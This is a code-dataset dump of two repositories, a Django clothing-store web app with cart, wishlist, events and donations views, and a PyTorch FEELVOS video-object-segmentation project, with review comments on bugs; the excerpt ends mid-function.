repo_name
string | combined_content
string | file_paths
list |
|---|---|---|
0-Ajay-Bhargav-0/FashHUB
|
from django.shortcuts import render,redirect,reverse,HttpResponse
from django.contrib.auth.models import User,auth
from django.contrib import messages
from .forms import ProfileForm,UserForm
from .models import Profile
def register(request):
    """Register a new user plus profile data, then send them to the login page.

    POST fields: username, email, phone_number, birth_date, password1, password2.
    GET (or a failed POST) re-renders the registration form.
    """
    if request.method == 'POST':
        username = request.POST['username']
        email = request.POST['email']
        phone_number = request.POST['phone_number']
        birth_date = request.POST['birth_date']
        password1 = request.POST['password1']
        password2 = request.POST['password2']
        # BUG FIX: the two password fields were read but never compared.
        if password1 != password2:
            messages.error(request, 'Passwords do not match')
            return render(request, 'register.html')
        # create_user() already persists the row; no extra save() needed.
        user = User.objects.create_user(username=username, email=email, password=password1)
        # Profile row is presumably created by a post_save signal — TODO confirm.
        profile = Profile.objects.get(user=user)
        profile.phone_number = phone_number
        profile.birth_date = birth_date
        profile.save()
        return redirect('/accounts/login')
    return render(request, 'register.html')
def login(request):
    """Authenticate a user from the login form.

    On success the session is established and the user is sent home;
    on failure an error message is flashed and the form re-renders.
    """
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        user = auth.authenticate(username=username, password=password)
        if user is not None:
            auth.login(request, user)
            return redirect('/')
        # Surface the failure to the template instead of only printing to stdout.
        messages.error(request, 'Invalid username or password')
    return render(request, 'login.html')
def logout(request):
    """Terminate the current session and return to the home page."""
    auth.logout(request)
    print("logged out")
    return redirect('/')
--- FILE SEPARATOR ---
from django.contrib import admin
from store.models import Product,Cart,Wishlist,Contact,events,Journal,Donations
# Register your models here.
# Expose every store model in the Django admin site.
admin.site.register(Product)
admin.site.register(Cart)
admin.site.register(Wishlist)
admin.site.register(Contact)
admin.site.register(events)
admin.site.register(Journal)
admin.site.register(Donations)
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 16:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated initial schema for the store app (Contact, Donations,
    # events, Journal, Product, Wishlist, Cart). Applied migrations must not
    # be hand-edited; add new migrations for schema changes.

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Contact',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=300, null=True)),
                ('details', models.TextField(max_length=300, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Donations',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('Name', models.CharField(max_length=300, null=True)),
                ('email', models.CharField(max_length=300, null=True)),
                ('phone_number', models.CharField(max_length=300, null=True)),
                ('address', models.CharField(max_length=300, null=True)),
                ('clothes_number', models.CharField(max_length=300, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='events',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=300, null=True)),
                ('organizer_name', models.CharField(max_length=300, null=True)),
                ('details', models.TextField(max_length=300, null=True)),
                ('phone_number', models.IntegerField(blank=True)),
                ('email', models.CharField(max_length=300, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Journal',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('img_front', models.ImageField(blank=True, upload_to='')),
                ('img', models.ImageField(blank=True, upload_to='')),
                ('category', models.CharField(max_length=300, null=True)),
                ('title', models.CharField(max_length=300, null=True)),
                ('author', models.CharField(max_length=300, null=True)),
                ('details', models.CharField(max_length=300, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mainimage', models.ImageField(blank=True, upload_to='')),
                ('img1', models.ImageField(blank=True, upload_to='')),
                ('img2', models.ImageField(blank=True, upload_to='')),
                ('img3', models.ImageField(blank=True, upload_to='')),
                ('price', models.FloatField()),
                ('studio_name', models.CharField(max_length=300, null=True)),
                ('size', models.CharField(max_length=300, null=True)),
                ('gender', models.CharField(max_length=300, null=True)),
                ('category', models.CharField(max_length=300, null=True)),
                ('rent_price', models.FloatField(null=True)),
                ('count', models.IntegerField(default=0)),
                ('rented', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='Wishlist',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('item', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='store.Product')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Cart',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Product')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 20:35
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: widens Journal.details from CharField(300) to
    # TextField(1000). Do not hand-edit applied migrations.

    dependencies = [
        ('store', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='journal',
            name='details',
            field=models.TextField(max_length=1000, null=True),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 20:52
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: adds Journal.content and Journal.date.
    # Do not hand-edit applied migrations.

    dependencies = [
        ('store', '0002_auto_20201101_0205'),
    ]

    operations = [
        migrations.AddField(
            model_name='journal',
            name='content',
            field=models.TextField(max_length=1000, null=True),
        ),
        migrations.AddField(
            model_name='journal',
            name='date',
            field=models.DateField(null=True),
        ),
    ]
--- FILE SEPARATOR ---
# Generated by Django 2.2 on 2020-10-31 21:15
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: renames events.details to events.bio (as a remove+add,
    # so existing details data is dropped). Do not hand-edit applied migrations.

    dependencies = [
        ('store', '0003_auto_20201101_0222'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='events',
            name='details',
        ),
        migrations.AddField(
            model_name='events',
            name='bio',
            field=models.TextField(max_length=1000, null=True),
        ),
    ]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
    # Store item: up to four images, buy/rent pricing, sizing, and stock count.
    mainimage = models.ImageField(blank=True)
    img1 = models.ImageField(blank=True)
    img2 = models.ImageField(blank=True)
    img3 = models.ImageField(blank=True)
    # category = models.ForeignKey(Category, on_delete=models.CASCADE)
    # detail_text = models.TextField(max_length=1000, verbose_name='Detail Text')
    price = models.FloatField()
    studio_name = models.CharField(max_length=300,null=True)
    size = models.CharField(max_length=300,null=True)
    gender = models.CharField(max_length=300,null=True)  # used by genderCategory view filter
    category = models.CharField(max_length=300,null=True)
    rent_price = models.FloatField(null=True)
    count = models.IntegerField(default=0)  # units in stock; decremented on buy
    rented = models.BooleanField(default=False)
    def __str__(self):
        # NOTE(review): returns the category, not a per-item name, so admin
        # listings show many identical labels — confirm this is intended.
        return self.category
class events(models.Model):
    # Community event submitted through the event registration form.
    name = models.CharField(max_length=300,null=True)
    organizer_name = models.CharField(max_length=300,null=True)
    bio = models.TextField(max_length=1000,null=True)
    #image = models.IntegerField(blank=True)
    #link = models.CharField(max_length=300,null=True)
    # NOTE(review): blank=True without null=True on an IntegerField will fail
    # at the database layer when the form leaves the field empty — verify.
    phone_number = models.IntegerField(blank=True)
    email = models.CharField(max_length=300,null=True)
    venue = models.CharField(max_length=300,null=True)
    date = models.DateField(null=True)
    def __str__(self):
        return self.name
class Journal(models.Model):
    # Blog-style article: cover/body images, a short teaser (details) and the
    # full text (content).
    img_front = models.ImageField(blank=True)
    img = models.ImageField(blank=True)
    category = models.CharField(max_length=300,null=True)
    title = models.CharField(max_length=300,null=True)
    date = models.DateField(null=True)
    author = models.CharField(max_length=300,null=True)
    details = models.TextField(max_length=1000,null=True)
    content = models.TextField(max_length=1000,null=True)
    def __str__(self):
        return self.title
class Contact(models.Model):
    # Contact-form message; the index view stores the sender's email in `name`.
    name = models.CharField(max_length=300,null=True)
    details = models.TextField(max_length=300,null=True)
    def __str__(self):
        return self.name
class Cart(models.Model):
    # One product placed in one user's cart (one row per addition).
    item = models.ForeignKey(Product, on_delete=models.CASCADE)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        return self.item.category
class Wishlist(models.Model):
    # One product on one user's wishlist. DO_NOTHING keeps the wishlist row
    # even if the product is deleted — NOTE(review): this can leave dangling
    # foreign keys; confirm intended.
    item = models.ForeignKey(Product, on_delete=models.DO_NOTHING)
    user = models.ForeignKey(User, on_delete=models.CASCADE)
    def __str__(self):
        return self.item.category
class Donations(models.Model):
    # Clothes-donation pledge captured by the donation form.
    Name = models.CharField(max_length=300,null=True)  # capitalised to match the form field
    email = models.CharField(max_length=300,null=True)
    phone_number = models.CharField(max_length=300,null=True)
    address = models.CharField(max_length=300,null=True)
    clothes_number = models.CharField(max_length=300,null=True)
--- FILE SEPARATOR ---
"""WASP URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
# Route table for the store app. The commented-out entries below were
# per-gender/category routes superseded by the generic genderCategory route.
urlpatterns = [
    path('',views.index,name='index'),
    path('eventform/',views.eventform,name='eventform'),
    path('eventpage/',views.eventpage,name='eventpage'),
    path('event/<int:id>',views.event,name='event'),
    path('journal/',views.journal,name='journals'),
    path('journal/<int:id>',views.journal_page,name='journal_page'),
    path('products/<int:id>/',views.product,name='product'),
    path('cart/',views.showcart,name='cart'),
    path('addcart/<int:id>',views.addcart,name='addcart'),
    path('buy/<int:id>',views.buy,name='buy'),
    path('buycart/',views.buycart,name='buycart'),
    path('showWishlist/',views.showWishlist,name='showWishlist'),
    path('addWishlist/<int:id>',views.addWishlist,name='addWishlist'),
    path('removeWishlist/<int:id>',views.removeWishlist,name='removeWishlist'),
    path('donation/',views.donation,name='donation'),
    path('products/<str:gender>/<str:category>',views.genderCategory,name='genderCategory'),
    path('aboutus/',views.aboutus,name='aboutus'),
    # path('<str:gender>/<str:category>',views.,name='menbottom'),
    # path('<str:gender>/<str:category>',views.,name='menfootware'),
    # path('<str:gender>/<str:category>',views.,name='menaccessories'),
    # path('women/<str:category>',views.,name='womenshirt'),
    # path('women/bottom',views.,name='womenbottom'),
    # path('women/footware',views.,name='womenfootware'),
    # path('women/accessories',views.,name='womenaccessories'),
    # path('kids/shirt',views.,name='kidsshirt'),
    # path('kids/bottom',views.,name='kidsbottom'),
    # path('kids/footware',views.,name='kidsfootware'),
    # path('kids/accessories',views.,name='kidsaccessories'),
    # path('fluids/shirt',views.,name='fluidsshirt'),
    # path('fluids/bottom',views.,name='fluidsbottom'),
    # path('fluids/footware',views.,name='fluidsfootware'),
    # path('fluids/accessories',views.,name='fluidsaccessories'),
]
# shirt
# jeans
# footware
# sheatshirts
# jackets
# fitness
# tshirts
# ethnic
# men, women, kid, fluids
--- FILE SEPARATOR ---
from django.shortcuts import render,redirect
from .models import Contact,Journal,Product,Cart,Wishlist,events,Donations
# Create your views here.
def index(request):
    """Render the landing page; a POST stores a contact-form message.

    The form posts 'email' and 'Message', stored in Contact.name and
    Contact.details respectively.
    """
    if request.method == 'POST':
        email = request.POST['email']
        message = request.POST['Message']
        # create() persists immediately; the original follow-up save() was redundant.
        Contact.objects.create(name=email, details=message)
    return render(request, 'index.html')
def eventform(request):
    """Event registration: POST stores a new event and redirects (PRG);
    GET renders the empty form.

    Keyword names mirror the template's input names exactly.
    """
    if request.method == 'POST':
        # create() persists immediately; the original follow-up save() was redundant.
        events.objects.create(
            name=request.POST['Event Name'],
            organizer_name=request.POST['Organisation'],
            bio=request.POST['Bio'],
            phone_number=request.POST['phone'],
            email=request.POST['email'],
            venue=request.POST['venue'],
            date=request.POST['date'],
        )
        return redirect('/eventform')
    return render(request, 'eventreg.html')
def eventpage(request):
    """List every registered event."""
    return render(request, 'events.html', context={'events': events.objects.all()})
def event(request, id):
    """Detail page for the event with primary key `id`."""
    selected = events.objects.get(id=id)
    return render(request, 'event.html', context={'event': selected})
def journal(request):
    """List all journal entries."""
    return render(request, 'journal.html', context={"journals": Journal.objects.all()})
def journal_page(request, id):
    """Render a single journal entry by primary key."""
    entry = Journal.objects.get(id=id)
    return render(request, 'journal-page.html', context={'journal': entry})
def aboutus(request):
    """Static about-us page."""
    return render(request, 'aboutus.html')
# def products(request):
# products = Product.objects.all()
# context = {
# "products":products,
# }
# return render(request,'products.html',context=context)
def product(request, id):
    """Product detail page for primary key `id`."""
    item = Product.objects.get(id=id)
    return render(request, 'product.html', context={"product": item})
def showcart(request):
    """Show the requesting user's cart contents."""
    entries = Cart.objects.filter(user=request.user)
    return render(request, 'cart.html', context={'cart': entries})
def addcart(request, id):
    """Put product `id` into the user's cart, then return home."""
    Cart.objects.create(item=Product.objects.get(id=id), user=request.user)
    return redirect('/')
def buy(request, id):
    """Purchase one unit of product `id`; stock never drops below zero."""
    item = Product.objects.get(id=id)
    item.count = max(item.count - 1, 0)
    item.save()
    return redirect('/')
def buycart(request):
    """Check out the user's cart: decrement stock for each item, empty the cart.

    Stock is clamped at zero so an oversold product never goes negative.
    """
    for entry in Cart.objects.filter(user=request.user):
        entry.item.count = max(entry.item.count - 1, 0)
        entry.item.save()
    # The original assigned delete()'s return value back to `cart` for no reason.
    Cart.objects.filter(user=request.user).delete()
    return redirect('/')
def showWishlist(request):
    """Show the requesting user's wishlist."""
    items = Wishlist.objects.filter(user=request.user)
    return render(request, 'wishlist.html', context={'wishlist': items})
def addWishlist(request, id):
    """Add product `id` to the user's wishlist (at most one row per product).

    get_or_create prevents the duplicate rows the original create() allowed,
    which also made removeWishlist's single-row lookup ambiguous.
    """
    product = Product.objects.get(id=id)
    Wishlist.objects.get_or_create(item=product, user=request.user)
    return redirect('/')
def removeWishlist(request, id):
    """Remove product `id` from the requesting user's wishlist."""
    product = Product.objects.get(id=id)
    # BUG FIX: the original used .get(item=product) — it ignored the user and
    # raised MultipleObjectsReturned when several users wishlisted the product.
    Wishlist.objects.filter(item=product, user=request.user).delete()
    # BUG FIX: 'showWishlist/' (no leading slash) resolved relative to the
    # current URL; use the absolute path.
    return redirect('/showWishlist/')
#remove cart feature
def genderCategory(request, gender, category):
    """List products matching both a gender and a category."""
    matches = Product.objects.filter(gender=gender, category=category)
    context = {
        "product": matches,
        "gender": gender,
        "category": category,
    }
    return render(request, 'sproducts.html', context=context)
def donation(request):
    """Clothes-donation form: POST records a Donations row; always re-renders.

    NOTE(review): a successful POST falls through to render() instead of
    redirecting, so a browser refresh resubmits the form — consider PRG.
    """
    if request.method == 'POST':
        # create() persists immediately; the original follow-up save() was redundant.
        Donations.objects.create(
            Name=request.POST['name'],
            email=request.POST['email'],
            phone_number=request.POST['phone'],
            address=request.POST['address'],
            clothes_number=request.POST['clothes'],
        )
    return render(request, 'donations.html')
|
[
"/accounts/views.py",
"/store/admin.py",
"/store/migrations/0001_initial.py",
"/store/migrations/0002_auto_20201101_0205.py",
"/store/migrations/0003_auto_20201101_0222.py",
"/store/migrations/0004_auto_20201101_0245.py",
"/store/models.py",
"/store/urls.py",
"/store/views.py"
] |
0-Yzx/FEELVOS
|
from itertools import combinations
from cv2 import cv2
import os
import natsort
import pandas as pd
import numpy as np
import torch
import torchvision
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import ToPILImage
from torchvision import transforms, utils
from feelvos.transform import preprocessing
class FEELVOSTriple(Dataset):
    # Dataset yielding (reference, frame_a, frame_b) image/mask triples for
    # FEELVOS training, indexed from <root>/<split>_folder_list.txt.
    def __init__(self, root='./data/', split='train', transform=None):
        """Build the triple index.

        Reads one sequence-folder name per line from the folder list file,
        then enumerates frame triples inside <root>/image/<folder>.
        """
        super().__init__()
        self.root = root
        self.split = split
        self.transform = transform
        self.folder_list = []
        self.items = []  # list of 3-tuples of image paths
        folder_f = open(os.path.join(root, self.split+"_folder_list.txt"), "r")
        for x in folder_f:
            # Strip the trailing newline from each folder name.
            self.folder_list.append(x[:-1])
        for i in range(len(self.folder_list)):
            tmp_list = natsort.natsorted(os.listdir(os.path.join(root, 'image', self.folder_list[i])))
            for j in range(len(tmp_list) - 2):
                first = tmp_list[j]
                # NOTE(review): the inner loop indexes tmp_list[k+1]/[k+2]
                # independently of j, so every `first` frame is paired with the
                # same pairs starting at the second frame — looks like the
                # indices were meant to be offset by j; confirm intent.
                for k in range(len(tmp_list[j+1:])-1):
                    comb_1 = tmp_list[k+1]
                    comb_2 = tmp_list[k+2]
                    self.items.append((os.path.join(self.root, 'image', self.folder_list[i], first), os.path.join(self.root, 'image', self.folder_list[i], comb_1), os.path.join(self.root, 'image', self.folder_list[i], comb_2)))

    def __getitem__(self, index):
        """Load triple `index` as ([img0, img1, img2], [mask0, mask1, mask2])."""
        src = []
        mask = []
        seltem = self.items[index]
        for i in range(3):
            src.append(cv2.imread(seltem[i]))
            # Mask path derived by string-splitting the image path on '/' and
            # substituting 'mask' — assumes the exact ./data/image/<seq>/<file>
            # layout and POSIX separators; TODO confirm on other platforms.
            mask.append(cv2.imread(os.path.join(seltem[i].split('/')[1], 'mask', seltem[i].split('/')[3], seltem[i].split('/')[4])))
        sample = (src, mask)
        if self.transform is None:
            pass
        else:
            sample = self.transform(*sample)
        if self.split == 'train':
            # NOTE(review): replaces the first two images with their masks —
            # presumably feeding ground-truth masks as reference inputs during
            # training; confirm this is intentional.
            sample[0][0] = sample[1][0]
            sample[0][1] = sample[1][1]
        return sample

    def __len__(self):
        """Number of indexed frame triples."""
        return len(self.items)
# Smoke test: build both splits from ./data/ when run directly.
if __name__ == "__main__":
    ds_train = FEELVOSTriple(root='./data/', split='train', transform=preprocessing)
    ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
    print("DATA LOADED")
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
from feelvos.models.Embeddings import DepthwiseSeparableConv2D
class DynamicSegmentationHead(nn.Module):
    # Segmentation head: 7x7 depthwise-separable convs, ReLU, 1x1 conv,
    # channel-wise softmax.
    def __init__(self, cin, cout):
        super(DynamicSegmentationHead, self).__init__()
        self.depthwise_l = DepthwiseSeparableConv2D(cin, 256, 7)
        self.depthwise_r = DepthwiseSeparableConv2D(256, 256, 7)
        self.conv = nn.Conv2d(256, cout, 1)

    def forward(self, x):
        x = self.depthwise_l(x)
        # NOTE(review): depthwise_r is applied three times, so one weight set
        # is shared across all three layers (with no nonlinearity between
        # them) — confirm the weight sharing is intentional and not a
        # copy-paste slip.
        x = self.depthwise_r(x)
        x = self.depthwise_r(x)
        x = self.depthwise_r(x)
        x = nn.ReLU(inplace=True)(x)
        x = self.conv(x)
        # Softmax over the cout output channels at each pixel.
        x = nn.Softmax2d()(x)
        return x
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import torch.nn.functional as F
from modelsummary import summary
class DepthwiseSeparableConv2D(nn.Module):
    """Depthwise convolution followed by a 1x1 pointwise channel projection."""

    def __init__(self, c_in, c_out, kernel_size=1, stride=1, padding=0, dilation=1, bias=False):
        super(DepthwiseSeparableConv2D, self).__init__()
        # Depthwise stage: one filter per input channel (groups=c_in).
        self.conv1 = nn.Conv2d(c_in, c_in, kernel_size, stride, padding, dilation, groups=c_in, bias=bias)
        # Pointwise stage: 1x1 convolution mixing channels.
        self.pointwise = nn.Conv2d(c_in, c_out, 1, 1, 0, 1, 1, bias=bias)

    def forward(self, x):
        return self.pointwise(self.conv1(x))
class PixelwiseEmbedding(nn.Module):
    """Two-stage per-pixel embedding: a 3x3 depthwise-separable conv followed
    by a 1x1 projection to the final embedding width."""

    def __init__(self, c_in, c_out_1, c_out_2):
        super(PixelwiseEmbedding, self).__init__()
        self.separable = DepthwiseSeparableConv2D(c_in=c_in, c_out=c_out_1, kernel_size=3, stride=1, padding=1)
        self.conv1 = nn.Conv2d(c_out_1, c_out_2, kernel_size=1, stride=1, padding=0)

    def forward(self, x):
        return self.conv1(self.separable(x))
--- FILE SEPARATOR ---
from cv2 import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from modelsummary import summary
from feelvos.models.Backbone import UNet
from feelvos.models.Embeddings import PixelwiseEmbedding
from feelvos.models.DynamicSegmentationHead import DynamicSegmentationHead
from feelvos.models.Matching import global_matching, local_matching
class FEELVOS(nn.Module):
    # Full FEELVOS model: optional UNet backbone, per-class pixel embeddings,
    # matching against reference/previous frames, dynamic segmentation head.
    def __init__(self, c_in, n_classes, use_gt=True, pretrained=None):
        """c_in: backbone input channels; n_classes: number of object classes.

        use_gt=True feeds ground-truth masks directly (backbone skipped for
        the first two frames); pretrained is a path to UNet weights.
        NOTE(review): the backbone is only constructed when `pretrained` is
        given, yet forward() calls it when use_gt is False — callers must
        always pass weights in that mode.
        """
        super(FEELVOS, self).__init__()
        self.n_classes = n_classes
        self.use_gt = use_gt
        self.backbone = None
        if pretrained is not None and self.backbone is None:
            self.backbone = UNet(c_in, n_classes)
            self.backbone.load_state_dict(torch.load(pretrained))
            self.backbone.eval()
        self.embedding = PixelwiseEmbedding(n_classes, n_classes, 100)
        # Head input channels: n_classes current-frame maps + global match +
        # local match + previous-frame class map.
        self.dsh = DynamicSegmentationHead(n_classes+1+1+1, 1)

    def forward(self, x_list):
        # x_list: [reference frame, previous frame, current frame].
        x1 = x_list[0]
        x2 = x_list[1]
        x3 = x_list[2]
        if self.use_gt == False:
            with torch.no_grad():
                x1 = self.backbone(x1)
                x2 = self.backbone(x2)
            with torch.no_grad():
                x3 = self.backbone(x3)
        x1_l = []; x1_e = []
        x2_l = []; x2_e = []
        x3_l = []; x3_e = []
        gm = []; lm = []
        logits = []
        # Downsample all maps to 32x32 before pixel-wise matching.
        x1 = F.interpolate(x1, 32)
        x2 = F.interpolate(x2, 32)
        x3 = F.interpolate(x3, 32)
        for i in range(self.n_classes):
            # Single-channel per-class slices and their embeddings.
            x1_l.append(x1[:, i, :, :].unsqueeze(1))
            x1_e.append(self.embedding(x1_l[i]))
            x2_l.append(x2[:, i, :, :].unsqueeze(1))
            x2_e.append(self.embedding(x2_l[i]))
            x3_l.append(x3[:, i, :, :].unsqueeze(1))
            x3_e.append(self.embedding(x3_l[i]))
            with torch.no_grad():
                gm.append(global_matching(x1_e[i], x3_e[i]))
                # NOTE(review): `lm` also calls global_matching even though
                # local_matching is imported — likely meant to be
                # local_matching here; confirm.
                lm.append(global_matching(x2_e[i], x3_e[i]))
            x_t = torch.cat((x3, gm[i].cuda(), lm[i].cuda(), x2_l[i]), dim=1)
            logits.append(self.dsh(x_t))
        x = None
        for i in range(self.n_classes):
            if i == 0:
                x = logits[i]
            else:
                # NOTE(review): overwrites x every iteration instead of
                # accumulating, so only the last two class maps survive when
                # n_classes > 2 — confirm intent.
                x = torch.cat((logits[i-1], logits[i]), dim=1)
        return x
if __name__ == "__main__":
    # Smoke test: run the model on two example frames on GPU 0.
    device = torch.device("cuda:0")
    model = FEELVOS(3, 1, use_gt=False).cuda(device=device)
    # summary(model, torch.zeros((1, 3, 512, 512)).cuda(), show_input=True)
    # summary(model, torch.zeros((1, 3, 512, 512)).cuda(), show_input=False)
    x1 = cv2.imread('example/x2.png')
    x2 = cv2.imread('example/x3.png')
    x1 = cv2.resize(x1, dsize=(256, 256))
    x1 = torchvision.transforms.ToTensor()(x1)
    x1 = x1.unsqueeze(0).to(device=device)
    x2 = cv2.resize(x2, dsize=(256, 256))
    x2 = torchvision.transforms.ToTensor()(x2)
    x2 = x2.unsqueeze(0).to(device=device)
    x = torch.cat((x1, x2), dim=0)
    # NOTE(review): forward() takes a single list argument, but three
    # positional tensors are passed here; also use_gt=False with no
    # `pretrained` leaves backbone=None — this smoke test likely fails.
    y = model(x, x, x)
    print(y)
--- FILE SEPARATOR ---
from cv2 import cv2
import torch
import torch.nn as nn
import torchvision
from torch.autograd.variable import Variable
from .correlation_package.correlation import Correlation
def distance(p, q):
    """Scalar dissimilarity in [0, 1) between two embedding vectors.

    Compares total squared magnitudes: d = |sum(p^2) - sum(q^2)|, mapped
    through 1 - 2/(1 + e^d), so identical energies give 0 and large gaps
    approach 1.
    """
    p_energy = torch.sum(p * p)
    q_energy = torch.sum(q * q)
    gap = torch.norm(p_energy - q_energy, p=2, dim=-1)
    return 1 - (2 / (1 + torch.exp(gap)))
def global_matching(x, y):
    """Per-pixel distance map between embedding tensors x and y.

    Both inputs are (B, C, H, W); the result is (B, 1, H, W) where each entry
    is distance() applied to the channel vectors at that pixel.
    """
    result = torch.zeros(x.size(0), 1, x.size(2), x.size(3))
    for b in range(x.size(0)):
        for row in range(x.size(2)):
            for col in range(x.size(3)):
                result[b, :, row, col] = distance(x[b, :, row, col], y[b, :, row, col])
    return result
def local_matching(x, y, window):
    """Placeholder for windowed local matching — returns an all-zero map.

    The Correlation-based implementation is commented out (it needs the CUDA
    correlation package); until it lands, callers get zeros of shape
    (B, 1, H, W). `window` is currently unused.
    """
    # out_corr = Correlation(pad_size=6, kernel_size=window, max_displacement=0, stride1=1, stride2=1, corr_multiply=1)(x, y)
    return torch.zeros(x.size(0), 1, x.size(2), x.size(3))
--- FILE SEPARATOR ---
import random
import torch
import torch.nn as nn
import torchvision
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
from feelvos.models.Backbone import UNet
from feelvos.dataset import FEELVOSTriple
from feelvos.transform import preprocessing
# Prefer GPU when available.
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(device)

if __name__ == "__main__":
    # Visual sanity check: run the pretrained UNet backbone on random test
    # samples and dump input / ground-truth / prediction images to ./testimage/.
    target_folder = './data/'
    ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
    loc = './unet/weight010'
    model = UNet(3, 1)
    model.load_state_dict(torch.load(loc+'.pt'))
    model = model.to(device)
    model.eval()
    pick = []
    for i in range(1):
        # NOTE(review): assumes the test split has at least 500 items.
        pick.append(random.randrange(0, 500, 1))
    for i in pick:
        X, y = ds_test.__getitem__(i)
        torchvision.utils.save_image(X[0], './testimage/'+str(i)+'_X'+'.png')
        torchvision.utils.save_image(y[0], './testimage/'+str(i)+'_y'+'.png')
        # NOTE(review): .cuda() here ignores the CPU fallback chosen above.
        X = X[0].view(1, 3, 256, 256).cuda()
        y_pred = model(X)
        torchvision.utils.save_image(y_pred, './testimage/'+loc.split('/')[-1]+'_'+str(i)+'_ypred'+'.png')
--- FILE SEPARATOR ---
import argparse
from feelvos.dataset import FEELVOSTriple
from feelvos.transform import preprocessing
from feelvos.models.FEELVOS import FEELVOS
from feelvos.loss import dice_loss
from feelvos.metric import dice_coeff
from feelvos.trainer import Trainer
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from tensorboardX import SummaryWriter
# Command-line configuration for FEELVOS training.
parser = argparse.ArgumentParser()
parser.add_argument(
    '--batch_size', type=int, default=7
)
parser.add_argument(
    '--epoch', type=int, default=40
)
parser.add_argument(
    '--lr', type=float, default=0.001
)
parser.add_argument(
    '--dataset', type=str, default='./data/'
)
parser.add_argument(
    '--workers', type=int, default=4
)
cfg = parser.parse_args()
print(cfg)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)

if __name__ == "__main__":
    # NOTE(review): dataset root is hard-coded to './data/' below although a
    # --dataset flag exists — confirm which should win.
    ds_train = FEELVOSTriple(root='./data/', split='train', transform=preprocessing)
    ds_test = FEELVOSTriple(root='./data/', split='test', transform=preprocessing)
    dl_train = DataLoader(ds_train, batch_size=cfg.batch_size, shuffle=True, num_workers=cfg.workers)
    dl_test = DataLoader(ds_test, batch_size=cfg.batch_size, shuffle=False, num_workers=cfg.workers)
    print("DATA LOADED")
    # Ground-truth-fed FEELVOS with a frozen pretrained UNet backbone.
    model = FEELVOS(3, 1, use_gt=True, pretrained='./unet/weight010.pt')
    optimizer = torch.optim.Adam(model.parameters(), lr=cfg.lr)
    criterion = nn.BCELoss()
    success_metric = nn.BCELoss()
    summary = SummaryWriter()
    trainer = Trainer(model, criterion, optimizer, success_metric, device, None, False)
    fit = trainer.fit(dl_train, dl_test, num_epochs=cfg.epoch, checkpoints='./save2/'+model.__class__.__name__+'.pt')
    # Persist both the state dict and the full pickled module.
    torch.save(model.state_dict(), './save/final_state_dict.pt')
    torch.save(model, './save/final.pt')
    loss_fn_name = "cross entropy"
    best_score = str(fit.best_score)
    print(f"Best loss score(loss function = {loss_fn_name}): {best_score}")
--- FILE SEPARATOR ---
from cv2 import cv2
import torchvision.transforms as transforms
def preprocessing(images, masks):
    """Resize image/mask pairs to 256x256 and convert them to float tensors.

    Masks are reduced to single-channel grayscale, and the label value 29 is
    promoted to 255 — presumably to binarize DAVIS-style palette masks; TODO
    confirm against the dataset's palette.

    Returns (images, masks) as two lists of float tensors.
    """
    fin_images = []
    fin_masks = []
    image_transform = transforms.Compose(
        [
            transforms.ToTensor(),
        ]
    )
    for image, mask in zip(images, masks):
